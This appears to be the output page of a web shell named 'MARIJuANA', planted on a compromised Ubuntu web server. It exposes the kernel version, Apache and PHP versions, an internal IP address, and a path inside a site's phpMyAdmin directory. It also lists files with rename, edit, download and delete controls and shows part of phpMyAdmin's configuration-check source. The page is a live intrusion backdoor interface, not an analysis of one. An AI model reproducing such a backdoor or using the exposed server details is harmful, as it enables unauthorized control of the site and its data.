MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/barra_do_choca/public_html/phpmyadmin/libraries/classes/Config/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
Forms dir drwxrwxr-x 2021-01-14 03:39 R D
ConfigFile.php 14.248 KB -rw-rw-r-- 2020-03-20 22:08 R E G D
Descriptions.php 73.929 KB -rw-rw-r-- 2020-03-20 22:08 R E G D
Form.php 6.079 KB -rw-rw-r-- 2020-03-20 22:08 R E G D
FormDisplay.php 29.013 KB -rw-rw-r-- 2020-03-20 22:08 R E G D
FormDisplayTemplate.php 17.694 KB -rw-rw-r-- 2020-03-20 22:08 R E G D
PageSettings.php 5.544 KB -rw-rw-r-- 2020-03-20 22:08 R E G D
ServerConfigChecks.php 19.702 KB -rw-rw-r-- 2020-03-20 22:08 R E G D
Validator.php 18.504 KB -rw-rw-r-- 2020-03-20 22:08 R E G D
REQUEST EXIT
cfg = $cfg; } /** * Perform config checks * * @return void */ public function performConfigChecks() { $blowfishSecret = $this->cfg->get('blowfish_secret'); $blowfishSecretSet = false; $cookieAuthUsed = false; list($cookieAuthUsed, $blowfishSecret, $blowfishSecretSet) = $this->performConfigChecksServers( $cookieAuthUsed, $blowfishSecret, $blowfishSecretSet ); $this->performConfigChecksCookieAuthUsed( $cookieAuthUsed, $blowfishSecretSet, $blowfishSecret ); // // $cfg['AllowArbitraryServer'] // should be disabled // if ($this->cfg->getValue('AllowArbitraryServer')) { $sAllowArbitraryServerWarn = sprintf( __( 'This %soption%s should be disabled as it allows attackers to ' . 'bruteforce login to any MySQL server. If you feel this is necessary, ' . 'use %srestrict login to MySQL server%s or %strusted proxies list%s. ' . 'However, IP-based protection with trusted proxies list may not be ' . 'reliable if your IP belongs to an ISP where thousands of users, ' . 'including you, are connected to.' ), '